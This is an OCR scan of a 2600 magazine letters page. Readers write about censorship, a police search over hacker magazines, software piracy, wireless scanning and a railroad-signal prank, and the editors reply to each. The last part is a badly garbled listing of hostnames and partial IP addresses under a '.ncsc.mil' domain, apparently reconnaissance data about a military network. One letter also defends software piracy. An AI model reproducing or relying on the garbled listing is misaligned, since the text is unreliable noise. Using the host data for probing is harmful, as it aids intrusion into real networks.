I agree with the philosophies of your magazine on one level. I've also noticed it is easy to get caught up in. And sometimes I find myself agreeing with what you advocate and other times questioning it. While I love the info, I have to question it. If we never questioned, we would all be sheep. While 2600 is definitely an authority in the hacking world (or underworld if that is easier to swallow), I urge the readers to mill over and ultimately question what they read. Because even if they are fellow hackers, you don't have to agree with them or their ideals. And as idealistic and good-sounding as 2600 is, that doesn't make it 100 percent correct.
I'm not accusing 2600 of anything. I'm just saying that you should question everything to make sure it works for you. Being spoon-fed by other hackers is the last thing we need. Question This. Question Life.
Question Star Trek. But more importantly, Question Everything.
Resurrection 20

We couldn't agree more. Unquestionably.

Injustice Department

Dear 2600:
While you may feel like this letter is an attempt at someone using you as a soapbox to rant about repression of their right of free speech, it is actually my acknowledging some intriguing similarities between your lawsuits and my job (if that makes any sense). I work at an adult video/toy store in California in a town of less than 10,000, although we serve approximately 100,000+ clientele from all over the area. Due to recent events, our store will be forced to shut its doors forever due to ignorance and hatred aimed at us, simply because we are looked down upon by our local government and several religious circles. In more detail, the town government instated a law that prohibits any adult related shops from conducting business within 2000 feet of a school and 1500 feet from any church. This is ironic because we are two blocks away from an elementary school and four blocks away from our local Presbyterian church, and the law was instated two years after we had opened! Anyway, our store has always obeyed the strict laws that the state regulates our industry by, and we have always been in cooperation with these as well as any city ordinances, with exception to the one stated because of obvious reasons. We have been in constant court battles, won every single appeal, and still our local government has us in their crosshairs.
The clincher here is a recent overnight arson attempt on our store which did approximately $45,000 in damage and also ruined our already tarnished image when the newspapers printed the city's response to it: "That is the kind of people that ****** Video World attracts. It is their own fault for bringing lowlife trailer trash into the city, and they get no sympathy from us."
That is directly out of our local newspaper.
The store owner decided to shut down in October. I now have to take two jobs to match the salary I was making in order to keep rent and afford tuition. My insurance has already been canceled and I have to pay $95 every other week for a bottle of insulin so I can live. Yet the most hurtful thing of all is that I have lost close friends, some family members have turned their backs on me, and I have even been refused service at a local grocery store because the owner knows where I work!
And why exactly? Religiously influenced and biased government taking a stranglehold on a privately owned adult shop simply because they decided to conduct business. Not because they did anything wrong, but simply because it existed and certain people didn't want it to.
All the best with your endeavors. Thanks for telling it like it is instead of how they want us to think it is.
deejayredlOO II

We have no doubt that some of our readers will disagree but we find the above treatment all too common and symptomatic of some serious problems in our culture. Unless you were soliciting customers from the elementary school or leaving brochures in the pews of the church, you should have been treated as any other member of the community. This kind of coexistence happens in other countries all the time without any adverse effects. We, on the other hand, seem to be moving ever closer to a fundamentalist hell.

Dear 2600:
Thought I would tell you guys about my web host and how they have annoyed me. They were fine for about half a year, then suddenly a few days ago my site disappeared. All the files have been deleted and all that is visible is a placeholder. I have been locked out of the admin interface, too. What annoys me is that I had no warning, no explanation, and no chance of backup. It simply switched off. I have tried contacting them.
They won't get back to me via email and their phone number doesn't work. It is companies like these that really disappoint me. It's gotten harder to find decent, proper companies that don't treat customers as if they were meaningless.
Mart

There are a couple of lessons here. Always keep your own backups. Never rely on people you don't really know to do anything except cash your checks. And whenever possible, try to run your site yourself. That way, the most you can lose due to someone else's incompetence, ill will, bankruptcy, etc. is a temporary loss of bandwidth.

Dear 2600:
I work as a delivery driver here in North Carolina and I usually get home rather late. I live in a fairly small town (2,000 residents and 10,000 college kids) and my car is very easily identifiable by the numerous computer related stickers on the back of it. I was stopped by the law at a license check... a fairly routine happening. They looked at my license and then asked me to pull off to the side - an officer would be with me shortly. After waiting for ten minutes, the officer who put me aside asked me to step out of the car. Now remember, I am a delivery driver, and common sense would tell you that I have a valid driver's license and also that I would not be under the influence of any substance (perhaps caffeine?). So naturally, I was a bit puzzled by this. He then asked me if he could search my car and of course I said (in a polite fashion), "No, you may not. I do not feel that there is any reason for you to search, and certainly no probable cause." Oh, but this officer found probable cause... there was a stack of 2600: The Hacker Quarterly in my back seat ranging from 1998 through 2002. He said that this was a "suspicious magazine" and he was baffled that I would even think to have such a thing in my possession. I told him that I did not believe this was any reason or cause to search my car, so he called one of his boys over.
They told me that I was interfering with an officer's line of duty and that I could be thrown in jail for such behavior. I am not one to get thrown in jail (especially at the age of 18, still living with parents), so I stepped aside. After a 30 minute search, they decided the car was fine and there was no reason to hold me any longer. They even had drug dogs there to sniff everything out... looking for that kilo of cocaine that every cop just knows is in there somewhere. Needless to say, I think that this is a perfect example of what the media has done to "hackers" and the image they have drawn of us. I would love to press charges, but being an 18 year old entering college, I simply don't have the funds.

Evnglion

You acted entirely properly by questioning them, keeping your cool, knowing when to back down, and letting the world know what happened. Unfortunately this kind of thing will continue to happen. It's always a good idea to get as much information as possible from the scene - car number, badge number, names, etc. - in the event that you decide to pursue matters later. Most people choose not to and we completely understand why.

Dear 2600:

First off, great magazine - you've managed to inform the hacker world of many new laws, news, ideas that otherwise we wouldn't experience through mainstream media. I had closely followed your trouble over the domain fuckgeneralmotors.com. Upon hearing this, I too was outraged that because a big corporation saw some offense to this, they should go strip away a component to our First Amendment. So in support of your effort, I registered www.generalmotorssucks.cjb.net. I successfully maintained the site which I linked to ford.com. But not too long ago, I found that my page had been shut down without notice, my password to my account was invalid, and I have had no contact from any .cjb rep. I am considering filing a lawsuit or at least notifying the public of this so they can also voice their concern.
Any thought/word would be appreciated.

ini .source

Since you're using this company's name, they have the ability to simply disconnect you (although they seem rather immature for doing it the way they did). If you want to make any kind of statement using a domain name, you should register the entire domain name under .com, .net, etc. and then find service through the provider of your choice. If they shut that off, it's a much bigger issue.

Dear 2600:

I was in Wal-Mart in Hammond, Indiana the other day - the day the Spider-Man DVD and VHS came out. So I figured I'd go pick up a copy as long as I had the cash. So I walked over to electronics and stood in line. Note that I am 14 years old and I look more like 16. I asked to buy the Spider-Man DVD (they had it behind the counter) and they said "You have to be 17 or older with ID to be able to buy this movie." Now the movie is freaking rated PG-13 and to top it off they had the VHS sitting right on shelves near the cash registers outside electronics and by music in electronics. Why in the hell would they card me for Spider-Man? Just another case of morons power abusing.

Dime Tanaka

Definitely moronic behavior. If you're not in the mood for a confrontation with the store manager, we suggest writing a polite but firm letter to the main headquarters telling them of your unpleasant experience. Oftentimes this leads to some sort of resolution.

Dear 2600:

I gave a speech today at PM 1 and started by showing people how easy it is to get on wireless networks, even those that are encrypted. I'm sorta nervous now that I'll be hauled away in a black van tonight. I just felt the need to write something in case I'm never heard from again! It's a shame that we must live fearing that our academic works will come back to haunt us. (I also plugged 2600 during the speech.)

Todd

That's right, drag us down with you.

Thoughts On Piracy

Dear 2600:

I am an avid software pirate.
Much of the software that I use is pirated because I am one poor bastard. However, being a software developer myself, I realize the importance of getting what is due for your hard work. Wait a minute? Huh? How can I develop software and condone piracy? Here's my thinking on the matter. First of all, when I benefit in any way other than purely educational, I make a point of purchasing a full copy of whatever program I'm using. I had a pirated version of Dreamweaver for quite awhile. When I finally started posting real web pages developed in it, I purchased the full version (Version 3, but that's good enough for me right now). I also have a pirated copy of 3D Studio Max that I've had for years. The version I have is old, but I have fun with it. Will I ever use it in a professional sense? No. Should I pay massive amounts of money to use something that I just fart around with on occasion? I don't think so! Does the developer lose out because I didn't pay for my copy? Let's put it this way... if I were forced to decide today between keeping it and paying the money, or giving it up, it'd be no contest. I'd give it up. I don't need it that bad. I'd never used it in a way to justify the price. So what does the developer lose? Money that they'd never have anyway if their program were completely pirate proof? If the day comes, and I doubt it will, when I use what I create in 3DS Max for something more than idle fun, I'll pay for it. Until then, I see no loss by anyone. I hope others use the software I create in the same manner.

II269U

Questions

Dear 2600:

Does your magazine have any competition in its class? I'm sure you know many magazines do have competitors, however I've never seen competition to yours. I'm not trying to suggest anything negative about your magazine. It may look as though I am.
I just enjoy this type of reading material and I get through your magazines pretty quickly because of that.

Super-Fly

There are plenty of Internet zines out there but we haven't found any other paper publications that are devoted to the hacker world. Occasionally we see an abortive attempt. They usually don't succeed for a number of reasons - they try to get too big too fast, they get spooked by the legal threats and hate mail, or they simply realize what a commitment it really is. We need a good deal more zines covering this stuff, not just here but all around the world.

Dear 2600:

I just read the article on 802.11b (19:2) and it told me 99 percent of everything I wanted to know about 802.11b networks except for the one thing I really wanted to know. In the article it said they used a "magmount antenna on the roof." How do I hook this up to the card - or does the card just use the antenna through osmosis? I would love to scan the surrounding area, but need signal strength.

In a TrAnCe

Many 802.11 cards have antenna jacks on them but for those that don't you're pretty much out of luck. You may want to ask google about your card and "antenna jack" to see if there is a way you might add one, but it's generally not a reliable hookup. Even so, you'll almost certainly need an adapter (commonly called a "pigtail") to go from your antenna's jack (probably an "N" jack, look for pictures) to your card's jack (probably SMA).

Dear 2600:

I was wondering why there is something strange on page 33 at the bottom of the page where it should say "Page 33"? Each time there is something different but it is never correct.

QuielSIuidow

We get more mail on this than on any other subject by far. And yet, everyone who writes in seems to know what page number they're talking about even though they claim the page number information is faulty! It defies all logic.

Dear 2600:

I have a folder on my computer that I cannot open or manipulate in any way.
It is located in my C:\ drive and when I double-click it, an error message pops up that says "This folder does not exist." Can you tell me what has happened?

Phule_2k2

Your problem appears to be that you're running Windows. Other than that, this is one we weren't able to find an immediate answer for. We'll let you know what we find.

Dear 2600:

I was wondering if you could please tell me who is the man on the right side of cover 19:3. Also if you could please enlighten me as to what "might" be on the disk and roll of film. Keep up the good fight - because of you the ideals and principles of many have been changed.

Quiet Riot

Answering these questions would undoubtedly lead to more questions and the need for more answers and a possible Senate inquiry. Let's just say it's a pretty picture and leave it at that.

Dear 2600:

Maybe I have something wrong or have misunderstood H.R. 5469. Why are radio stations that broadcast an FM signal to my car allowed to continue to simulcast over the Internet with no proposed legislation against them? Why have the Internet radio stations been singled out? Did I miss something?

ddShelby

Any Internet broadcast is affected in some way. Broadcast stations are no exception. But it serves to prove the absurdity of the legislation as broadcast stations can have as many people listening to them over the airwaves as they can get without incurring any extra fees. But for every listener on the Internet (which already carries a bandwidth cost for each stream), an additional fee is levied. Imagine what would happen if stations were charged that fee for every listener estimated by the Arbitron ratings service. The most popular stations would probably go broke. (Maybe it's not such a bad idea.)

Dear 2600:

I was wondering if an article about OfficeMax would be of interest.
I've read the articles about Radio Shack and recently the one about Target, and I was wondering if your magazine would be interested in an article about OfficeMax. Things such as store security, breaking through the security on the HP Custom Computer Centers/logging in as administrator, the mi ix terminals, and other related topics. I would be more than happy to submit such an article if it would be of use. Please let me know so I could get started. Thank you.

(ianjaf

If we print an article about one retail outlet, naturally we're interested in others. That's not a guarantee that we'll print this specific article but the topic certainly qualifies. The general rule of thumb is that if you have an article to write, just write it and send it. We may not print it but at least you will have written it, which is generally a good thing to do.

Dear 2600:

I think that your magazine is the greatest. I read it all the time at my local Chapters Bookstore. I always read it cover to cover. It's the best.

I have a situation that I don't know what to do. In my neighborhood we have a fun game. We i ms on the railroad tracks to make the traffic i rn i mu come down. The winner is the one who • A the longest lineup of cars. I i i week I was sure I would win the contest. I i . i ii i busy day at 5 pm, I did everything properly. I : and came back an hour later to make sure I had the longest car line up of all my friends. 1 ambulance in the stuck car line. I feel very guilty about this. What should I do?

Tony

Why you feel compelled to ask us about this is a bit puzzling. Do you think a hacker magazine is going to go any easier on you for being a complete moron than any other part of society? Not likely. We're interested in how the technology works like most everyone else reading this.
But there's a rather major difference between that curiosity and an action that puts people's lives at risk - not just people stuck in traffic in ambulances but those who decide to ignore the barriers after waiting for a very long time. You can't do anything about the past but you can put a stop to this crap now and in the future before it really blows up in your face. If that actually got through to you, be sure to share your enlightenment with your friends.

Observations

Dear 2600:

A few weeks ago I ordered the DES encryption shirt alongside my subscription of your magazine and received it all without problems. Thanks for the fast service, but... the shirt doesn't seem to feature a DES Encryption schematic to me! The day before yesterday I had dinner with two friends who questioned the schematic to be DES. So when I had the time yesterday night I read through Applied Cryptography and found out DES is not working this way. Although I'm definitely not a cryptanalyst I could tell something was wrong. So I searched the book for more algorithms and learned about the IDEA algorithm. Its schematic looks almost exactly like the one on my shirt. There's only one difference: The XOR and Addition signs have been switched in the explanation on the bottom of the shirt. Now I'm confused. Is this thing on purpose? In a quick search on the Internet I can't find evidence on this, so I'm still confused. Can you please help me out on this one?

Freddy

You're right about the IDEA algorithm. As to the reversal, perhaps it's one of those mistakes we keep making to keep people on their toes.

Dear 2600:

I just found out something quite disturbing at my workplace. I'm an analyst for a major ISP in Canada and I had an interesting conversation with my friend at the abuse department. It seems that the RIAA is pressuring us to shut down customers who have been involved in file sharing, especially on the Kazaa network.
Apparently, the volume of threats by the RIAA, Sony, and other organizations is around 1000+ emails per month. They are receiving detailed logs with IP addresses and the names of the files that have been traded (even though everyone knows it's no proof). They've installed a new script on the Radius server to break down logs in smaller chunks so they can be searched faster. Needless to say, that is quite disturbing. So far, they have not shut down anyone, only sent warnings by email to the "offenders." They're in the process of deciding what to do next. I'll keep you posted. I thought you would find this interesting.

Quebec

It might be interesting to find out exactly how they're getting these logs in the first place. Are they perhaps running some sites of their own? Or is your ISP monitoring what their users do?

continued on page 48

.ncsc.mil (144.51.X.X)
annex 24 40 noaE49 an^ex £4 40 hpas5 Annex [24 5] hueSS [100 5| huSSSO. annex 12* .00 hasSSl anr-ex £4&i hQs:62 an-~ex 24.52 h 0*1 53. aim ex £4.53^ hMi54 4F1XKX 24-64 heal 5.5 tinners \2- 5'i hoaiSS. annex 24 56 1105.57. annex 24 h'l host 5-0 annex [24 53 beats? .ninex l 24.5? bpstfi. annex [24 8] npfftB [1G4Jfi| boareo. annex £4.60 noetBI 1 iinex 24.fi 1 hpgtSO nnnex ;-J 0? hpa!B3,annex. 24.02' hoattM . an^ex £4 fia hes165 ennex 24. B5 lie^lGS .trinflX £4 66 hoe(07. anrvqx ?4 67 hasl6it. an 1 " ex £4.60 hoa109. enrex 24 eg hortT.annax [84 7] hew? El CD 7] hcre370 ari'-nx £4 71 hoa$7i ennex 2 * < 1 hoaJ72 ennex 24 72 hffitl73 erl'.QX [24.73 ho n i74 Annex 24 74 hoel7i .ir'iinr £4 75 hoslTS annex £4 76 hoa177 annex 24.77 hoal7B annex 24.7B heal 70 .trtnex [24 7 5 noclfi pnnox r?4 6 1 noare [100.8] pperea annex 24 60 neetEH annex i‘24.6 1 :' bOat0? Alines [34.62 hggt83.anrics 63 noetsa .annex £4.li4 ".□6505 .annex 24.65; iiir, r 06. annex. 24.66 npet67ennpx 24.67 hoatBS annex £4 66 naa!09 annex £4 69 heai9 .annex [24 5- Iieul6 100 6]' bosC90.*fm*h ?4.90] hwEfll. annex 24.9 1] r,eet02. annex 24.92] neat93.annex 24 5oJ boatR4.annftx 24 54] hMt95.»nnxr* 24 -95] hPHtOS. annex 24.&61 bp*CB7. annex £4 &'] hnstBB .annex -24 56] i-.nEtog annex [34 99] hPlh.Rmpire.eDlipee [102 138] bp-221 .alpha [14.82| Tp2 t 01-222. alpha [14.1 2D 1 fipZIDfl-rai.emcin [23.2 [ •hp?i0Gr?1 lychp 13.43] np5£i [32.2B] hps|4-1 [33.311 hpl|4i-2 [33 021 hpIJSM [32 27] hpen'MI: : 39 155] hqenHE402 169.196 hgemiB463 1 39 197' h£*em|*404 S3VI9B h^iraia405 139 201 hqemnm40T M39 1931 hQen'nmSOI [139.200] htempi4ni 1 39 123' hqel-ni 1-402 139 194 hvbbtq edrpM [IDS Of] hurnpB0 3' |40 Ia'S] humcane |1 S3. 1431 hlitCfthtrfn [1 S3. 134 1 hyflra bctipse [112.116] hyflrnzfjun [40 1 96 1 ice 13£,4fl| tcePerg 1 1 113] rceeold [32. 97] pC^ttutif 1 32 95] irohouar [32.98] icelaa |:. : :J >6. 
KnmtKlal.lla [10S.t21] immerlal [1 .3S| intprneshullCsW [40 59] rndrjtna [30 1 3] .nfenup [32 14] nheeime |32.85'| mi and-eiLer ]40. 1 74 1 mlaiMle [40.44] Inprer-P55 [66.lO£] ■napecrre&E i(jfi £6| inlenaslighl [S39 162] untuned [123 1] inlpjrnrlld 120 10] inlomUtl 193- n | inlarnall? i£3.t£] inlernell 3 [50.34| lniemeil4 |123.14] Inifl'iiri I fi 1£3 If,; mlsjrnoll? 133 17] iniarnedfi 1 23.1 61 In lei he H y [123.1 lnlorntrL2 [Ut3, 2] IblornMEO ri?3 70 in!#rnet?2 [123 22 Ielernet23 i?3 £3 Internel24i 123.24 IflmnelOF. [123.26 I y I- IN 14 3 1 12 I 31 mternetfiO [90.82] In tamer a; [12H.4] Page 42 2600 Magazim met42 120 42 ■miivHP i£3-48 '"iMqi47{T£3 47 uineiS £ 123.5] ■■I 1 no 5ntMl £Ot.151 i 1* gnepy |91 10| ,ad«eua [91 175] 1 n iixim C9T.14] it inf n nwifter [92 44[ r Ni.sri^nl [92 Ifi] ■ In, r.-gr 191 170] 1 lociear [91 28] ededoek [91 9] A.Jadub [91 13 If 4 lei,'£|lor [92 ,16| * ton Ilrhul |02 35| * lecnol |9? 7] ■ ip > ypher [92.43 1 1 iit.iaily |9l.1?l] . 1# Hence | HI 169] - imuwapun [9S 25] . if, 1 [91 194] Iwiladmy E9l £32] ■ !,u j'92 40] . ■- ini 191.221 - \* luck *9 r 102 1 * n enabling |fli 197| ■ . . . :lua |9 I 142] n 104 | D.'il . • ',,J |4l 104 1 1 1 ■ ' ^ m. 9 1 . 1 80] . *-k*imge [02 421 > .me |9l.T0fi] I LWaueiehlE [91.140] , 'r.jdi.n [92 S| 1 ifjiflis [61 120] ■ i-.ji : n* j 1 9 1.222] s.|*lui'Js>e [91.1 77 1 * Ini'.* [91 15E] * itiawei [92.151 " rl [91 176] * hillgiht [64 1 56 1 tilt ■ |9£ 10] fellernrt [64.46] , i.ijpi.ig|p]9l 19fi| totnagma 191 2] •- n.-iir.-iw jr'.i A [ ,| 1 • III, -lien [01 190] [91.1 34 1 1 ir 1 1 1*1 1 ,'.l [92 2Q| Intnelltiaam [01 23] 1 in myth [?1 1G£[ . l«rl4>M«i |9t.101 ,1. ,. ii ] .' 1 i £.? . I ■...•III ]5£ 25 1 * n - iJrff ?31 - ’d | 1 1 1 *1 iirDCe [01 . HHJJ 1 :. |9l. S3tl | * htpenuri [91 -1 iit|iifio |64 153f - iit| urra Ifl 1 22?| 1 hpiiihl j(H i60| * Pr uuftl [82 11) R. topri^e ]9£ 19] * Htiji.ia rt [91.172] - laguteli [92 27[ ■ '"•ill.:* fin ]92 £0] .■■■, in [9i.£B] [gi. 
tea] ■ 'Mill I I |01 153] t "tin h |#1 22S| [9! ?76| * ■ .air] 92.9] . j in 1 161 1 .. n |V1 1961 1* ■ r.i 1 92 1 4| ■ 1 111.1 i'Ji 138] ■ X11I1 | '12 4 I [ r ■ | Ri I 37] ■ f, -H fl'Di] < ,. ■ | m xil [91 7] , h 1 M“-. |64. 3S7| 1 .. it 1 91 2K'i' ,. 1 9 J .165] 1 ape [91 152[ - »hn m |fli £4 1 ■ 1 . ■ iv [in ise| leiloeuTTEpD! [91.235] ledeleal |51 143] leaenger [91 .147] jadaieke:’i |91 0] l.idnEr.i rln [fi? A I ladaErail [fil 15a] iaSetrPL'1 [92. 12| ladevaler [92.31 1 >OevulH«e [9£ 0 1 iqMvaniais |9l 146] jgdiavapcT l.d 20-D| iBdievelvei [92,32] - adeivetei [9? 34] f adirwalXgi S91.1K) f arJewfl||ei rgr.iOSI igiin^alph |9l .19] ledowex 01 156i ■aoewiid 64 102] ertUwihJ 91 17Bj ectewpllsbane [01 . 1 39] jaijpvach! [0 1 .26] lacreyam [92.36| iatseyellow [92 371 ,emo7nt:.it r9£ 381 jec'azinc [01 175] atlez:edias ]9t.136 sin ug 129 196.5 29 ; airleg1 30 108-1 3D ;itl'lur|13l 106.151 felftogllE 108.152 lainugl 33 196.133 : :-lli..y 1-3-J 195 134 |4I0 hb 13S IBS ISIS |*IHng1» 106 136 alhug137 19B.137 alll'j.pl 36 100,1 3B ailing 139 195 139 all1u0l46 IBS 140 9IBU0141 106 Ml ailing 142 T 96. 1 42' alllug 145 195.143 alllug 144 IBS 144 |ailiugl45 TBS Mr, laiHuyMS 196 146' jeilUl(jH7 100 147 a iku-A 1 4fi 196 MB aillug149 196 140 : dJ|IU0iSft 190 156 .illiu 0 !S7 196 167 a6 2lr «IIHi*g212 196.212 all1ug213 196 213 |alMu-g214 IBS eta ]alllug?16 I0S2T0 bmusat? 196.21? leillugZIA 106 216 |aillug£l9 1 96 210 |ailiLtg220 11 90 ?j?fi |iil'uy?2i 1B0 22I |ail1ug222 125 222 jaiHug52S 1 96 225 .aULug226 196-820 ,Binufl227 IM ?£7 iVUvgSSB S 96.220 ,.:iilug£2B 106.229 jailrug235 196.253 iaiirug234 [196.234 iaiilug235 [1M-23S jam ugsi e? rifts i6/[ nneE inlehrik. gev 1 40 203] ezzPand [5 4] Sazzawing [SS 6fi) jeriporden [00 8i] immeharp [04.751 anFiyi-.owlei |B4. 13B[ , c-rkpumf. [65 21 1 l*rry [54 2] sel&luis elplia [Kft2] loirne Ha [182.41 el Bam rao 20 1 1 c-laen Its j 162 12| e*h«TWiiPt [fU.flrf] Tscxyiinp.iyphn [3 £| wnlsnafcfltorlon [2fi.29| Glttraa [07. 
IBS] pabua -ediiun id rj lumpypeu [37.??6] lunglDnag 1 93 [88 1&8] Ung|#eag1&4 55 19-1 lungieE i g 195 66 195 lurqleaeg 1 96 fifi 196 |urigl*Bag197 [06 197 [Mngteang : 90 [00. 1 96 psiigiesag ! 99 [0fi, ! !)9 1 ■ -91 r-s ag£0Q [BS.200 |.j-r.gle&ag20 1 [BS.201 jungl«sag202 [06 20? luuglftBiig203 [Rrl 203 |unle#cnplaFn [49 165! iuFikyard Ha | "62 99] uallce : la [162.14 1 1 hapuale .‘171 139] kapuxiel |t 71 ISi] kjtpualaZ ji 71 132 keenly. He ] 162.131] keenly [1 .71 1 Kenneltram [i5S 133] ktirkfi ]1 64] Mockknock r65.2ti[ knockmeEar-147 ]64 53[ knockmaler [84.54| hi if; id^y.lla [ISf 7] krnrhRT [34 5] iHtolbel: 164 32] laieelbox [64. 02] lobfllcau [64 2*| ■jbelcteL k [64,33] ,ntivl;,ich) 164 2fl| lotwHape 164 1 30| labelvele [64.23] Ahelvoie 1 54. 26 1 1ob*l weed |64 135! lucejidrili 1 40 70] iarieereham [04.7fl] •?.ng1 rala |155 I44i ishpiut-e 1 -4. eipha [n 235] I&ri[ f iut>el7.-el.iy [17.2361 luhpretKiES erlen |£G.£35j : L’.pdi6is'g [1 09] tar^bban [5*. 1-33] I are. Its, [lE2.05t maalle [6* 0S| las-pirhghi [OA l fi] laeer^iaefd |i3y.73-| i eje 1 (76.131 laudaniAe [4D 3-u Id ULln liln-ehor: [*£> 42] l*mrpiia [06 1] lehpdirr.p f 1.43 1 lehurne [32 84] lemai izlniger' [ 1 S4 5] IfrfiMOk £4Ci 36| lap Bclip&P i 1 02 1 1 J' lee 154.10] lesaangluede? [212 27| lesetK-.gl.bed9 [212 E>] le4Kin^U*dB?E21£.9?[ FaeocnQiuedBO 212.96 lathe [32.21] : exrr.Efh ryehe |3 ?36| le* m,nrk524. alpha [14.75] li?xe,erkF251 ry^p [fi 2671 I'barty [00.20] Irpra [15 i32| IHe 1 1 I0| IH*a|p (32 91] IlfMriddealh It 931 lltabeil 192.73) Uleblke |34.3i] IHrtlwd [3? 77! iii-tlo wn ]1 1 06 1 lileSual [3*. 14) Hlebupy [l.W| Waceieaf [32 09 j ■itnUn'rtSi [32,661 illechpp [34 13f i f ncpsJ& S 1 . MS] Recycle [52.71 1 (ireaeiTiantli [1 M71 nfa an n. 1 1,1 07] iga.sf urea-id [32.615 nieairsdrna ]32 07| nrahnsafi J34 32] hfafly [3£,03| liWough) 132 02 1 lilega-rne- ji4.3S] Hequare 134. 
1 7| lilehiaiety [1 9i] IrfOhutti [S?.ft2] IdehuTtEma |32 66| litomau ranee |34 j 2B] IrleiEatUasr |1 .65] lilerabati ;34 R6| IHVaeool 134.39] plfeis^ppU ]1.§2] ifaiah-aro ‘1 .35 ] JlMatong iSa.03] ifeisfiirm [34 £8[ SfemekDi ]34 16] ri'oiordiin 132.90 ireless i 1 .34'. Ilfal.'hfl [32 63] iKehne -24 rm EJltlbl [1 671 ritelong [32.70] iilempkeha [32 77] I irernytfiu d 11S| [34.21] hreepdapir-. ]32 1 9] hlpparty [04.33) lilepeei |32 75‘ MeppHi 1 3* 031 IMopeur M |34 £7] lilcpreBerva? (94 20J liler [-32 76f lileiaS [34.16] lllerupi [34 3D | lilbEabaach [’ 62] IHnaaver [32 S7! JltBWving (34i 2!2| HJeafnrh [34 37| ilJaeh-nei [1 1W1 HSm[« ji 8Ri n?aatin!cE Ti 60| iHaalch'y [1 103] 1. lesryl-u 1 1 90] Mesis-m : .J4 29 1 blatePie [ 1 . ?*] lil-nL-ker [1 .031 IKettila [1 1D4i IHtFtinn 1 3? 74| IHmwW L34.I0I llle^crk 1 1.80 1 HQhlraom.orlGri |£fl 2S[ limbo |1 6] libcoln Us [162.63] IIMWln [IS. SOS] iiriemuch- prase [574.S29| lirwmuch-road [174 1301 llaAeaellfl [iS6 i54 1 llonbrow 1150 15C'l lionface [1 86 165J lionrpot[156 160] Nonfuasli [166 1ST] honh-num [158.159| llonovi [lira 168) llaiwe ard [156. 16-4 : lidnetcne M 56 147] ItenhWlb [15D 162] llonweijfhE [t 56.165] ll&£.d [4Q.1I liir-u I apeatfy [*5.60] IHtledtoud 108.741 iltrlesli.b [66.051 iirrleaper [98 77 ittJflfiill i% 1S&1 BHJ*nape [ 123.34] nrilpislandi ]fiB.0$] iihiai3iendi 32 Elite I32j llttleialentH 6 1 IS 151] HttialatenctS 68.66 hlbeiEiand-l SB 90 1 ill distends 80.0? IdUieislAndS ]BB 04 i.tllelmk 1 1 96 224] 1 -i I email [96 70 1 Mi ec'-e [95 00. nliiopian [190. 1[ Wlleport |1Z3 1111 |.|1'et-i.ir | Of, 68] I mile team |66 69] 1 ii >iin-.e [Bd.66] Iflisieratiell [0fl:fi7| Itmgruir [1^5 14’,] lerax *pj>ch [2& 139] lolron [aO 1 40] l.-1-rt ■: e he 1 152.100] l,;*:,FB2 tli. |162 IDS] lubbeTlrmH [1.301 ixoptms-rSl u p^pn [26. 1 1 mec-hel ibol. tychc [3 39] met alpha ]1 4.203] m ptinix lla[162 55] matJviirnb [ 1 54 £1 : .naev-pprj 1 ;i54.2o] madweedio 154 in rhauweetlll 1S4 lo| madweedl? 
1 54 Q maoweod13 1 &4 9 madwaedH 154 7 iiiacHaedlS i fi* 6 rredykeeb? [154 IR madwebSSO 1 5* 32 rn-edwped£l I54 3C, niadwaed22 154 31 i-i^dweed23 154 23 TindveuadE* IS4 36 nad^nux!2S IS* 25 mad^pa{J26 154.27 fliadyraBd?? .154.24 ’n:ii]«i,nee20 154 23 mabiMPlKFB 154 £8 ma-3rwpari3 MS* >01 rnadweadao 154 1] ,'nnd^«ed-5l 154.35 ■ti:-,:3weed52 ’54 3D madw«!d33 iS4 37 matfwendSH VS4.3B mat1rteed35 154.30 moir-rttL-djfi 1554 40 madW*dIJ7 '04 4- madwnfldM ifi4 42 msidwMd3fl i S4 .4 3 madweed* [15* 17i madwaed4Cl '54 44- rr,gdwaed4t 154 45] madwebd*? T54.46] rr.adwnedS 1L.416 ifiagtVBfidS 15-4 15 mesJireDcJ7 154.14 mACUxL'tidR >54 >3; madonna!? 154.1? TiagiG [66. 1J irianeae [t.72| (flShfliwe. H& 1 162 1 24 1 ■N4ngHSvi L M R7| mapuftitll |4 0, 1 37] marara 11)0.2] (TieiffW | -32.63 1 maannms [32.60] madieiiaU [54 4fl! maF'in-qie&l [8S 0j rnelefir oedpae |102 7 1 i maLiihflw.ljcihg [3.1&4: micron alpha [14 64] micrelim [R9 3; nbddlofflpbl 1 1@0. 1 30] nudiSlamaoi |B5 ! ’■ ; mull and [36.97] nudnmyi !±ir-sh*h (153 1] abdiahOtml |153.?fl] midlandbaarn f 1 53. 30] m Uhmu: las - 1 £ 5 L L . 1 1 1 mpdlwndcanHry [15-3 4| mtdlandea rtu.-- ] 1 53 ,3] rn-dianrlriijmejsii | >S3.i B| TFiibla ndetyr amlte 1 1£3. 1 7 1 irirdle r.daxplcae 1 153. 14] rtiWIaedgolb [1S3-B] miaian-dldnifc.-n [s 53.1?! ml£Maribrtilnn.mi]i53 2] nutluiri -inu ;]ii< -l (1 1 5 1 mid androcifholl |V53 13] midfsndEiaie C 1 59 s> nittlandEmeka I1S3-D1] ntidlandelnke [15S 10] rbidljpnttewlErfUirjlfa.S] midiandlelon [1 53 25] m.idlanci'.ppre [153 19] rcndlindlmn. 1 [1S3 7[ nndtoncbifiicn L I TsS 16] m dljmdvflin [183.9 1 dl-lfl | E Ml | mrllBbla 1 1 .50] mrt|l*F*um lit |1 02.31] nungirerlypenor [153 £*) n'inevarmEhi38 [is* ifiel minevarrw&h 1 37 1 184 137] m mef am ;Eli 1 3fi j 184 1 3&J n-iiievain.nhi in [104 139] MlinlhP»r™Bhl4t! Mit4 1 40] nunevamiE-h 1 4 1 [164 141] m-inevam =hl42 ] 134 143 ! 
